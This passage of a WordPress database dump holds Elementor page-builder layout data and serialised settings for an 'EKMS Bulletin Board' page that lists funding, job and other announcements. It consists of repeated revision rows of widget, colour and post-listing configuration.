are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29163,4113,'_elementor_pro_version','3.3.6'),(29174,4115,'_elementor_edit_mode','builder'),(29175,4115,'_elementor_template_type','loop'),(29176,4115,'_elementor_version','3.4.0'),(29177,4115,'_elementor_pro_version','3.3.6'),(29178,4115,'_wp_page_template','default'),(29179,4115,'_elementor_data','[{\"id\":\"e4a1abb\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"15b418c\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"0d08dff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ee7a55e\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"dcb65e7\"}],\"structure\":\"30\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"6114d2a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":56.97699999999999675992512493394315242767333984375},\"elements\":[{\"id\":\"05e59ec\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"0dd0942\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":true},{\"id\":\"1bdd720\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":21.629000000000001335820343228988349437713623046875,\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"7b6adbb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\"}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"7beb698\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.998000000000001108446667785756289958953857421875},\"elements\":[{\"id\":\"9df80b7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"2c00b17\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"69112db\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%7D\\\"]\"}}],\"icon_align\":\"center\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29181,4115,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29183,4096,'_elementor_controls_usage','a:4:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:1:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:2:{s:16:\"content_position\";i:1;s:6:\"layout\";i:1;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:2:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(29184,4116,'_elementor_edit_mode','builder'),(29185,4116,'_elementor_template_type','wp-page'),(29186,4116,'_elementor_version','3.4.0'),(29187,4116,'_wp_page_template','default'),(29188,4116,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29190,4116,'_elementor_pro_version','3.3.6'),(29191,4117,'_elementor_edit_mode','builder'),(29192,4117,'_elementor_template_type','wp-page'),(29193,4117,'_elementor_version','3.4.0'),(29194,4117,'_wp_page_template','default'),(29195,4117,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29197,4117,'_elementor_pro_version','3.3.6'),(29198,4118,'_elementor_edit_mode','builder'),(29199,4118,'_elementor_template_type','wp-page'),(29200,4118,'_elementor_version','3.4.0'),(29201,4118,'_wp_page_template','default'),(29202,4118,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29204,4118,'_elementor_pro_version','3.3.6'),(29219,4120,'_elementor_edit_mode','builder'),(29220,4120,'_elementor_template_type','wp-page'),(29221,4120,'_elementor_version','3.4.0'),(29222,4120,'_wp_page_template','default'),(29223,4120,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"4096\",\"custom_columns\":\"1\",\"custom_posts_per_page\":10},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false}]'),(29225,4120,'_elementor_pro_version','3.3.6'),(29226,4121,'_elementor_edit_mode','builder'),(29227,4121,'_elementor_template_type','wp-page'),(29228,4121,'_elementor_version','3.4.0'),(29229,4121,'_wp_page_template','default'),(29230,4121,'_elementor_data','[{\"id\":\"54b7556\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df75915\"}]},\"elements\":[{\"id\":\"b473d47\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f2c7e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"You are on the EKMS Bulletin Board:\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2079558\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>This bulletin provides a space for funding announcements, jobs, and other related openings.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"59895cc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.26)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054d4e8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0991156\"}]},\"elements\":[{\"id\":\"4f39c88\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b49b03\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_rows\":\"5\",\"show_image\":\"\",\"excerpt_trimmed_ending\":\"...\",\"read_more_text\":\"Read More\",\"post_type\":\"ekms_bulletin\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c73414a\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"0baf480\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#6ec1e4\",\"post_title_color_hover\":\"#006400\",\"post_text_color\":\"rgba(122,122,122,0.59)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"meta_color\":\"#7a7a7a\",\"meta_typography_typography\":\"custom\",\"meta_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"excerpt_length\":10,\"arrow_type\":\"fa fa-angle-double-left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb8563c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e7317f1\"}]},\"elements\":[{\"id\":\"007d245\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2301b1e\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"f713c51\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"ekms_bulletin\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load 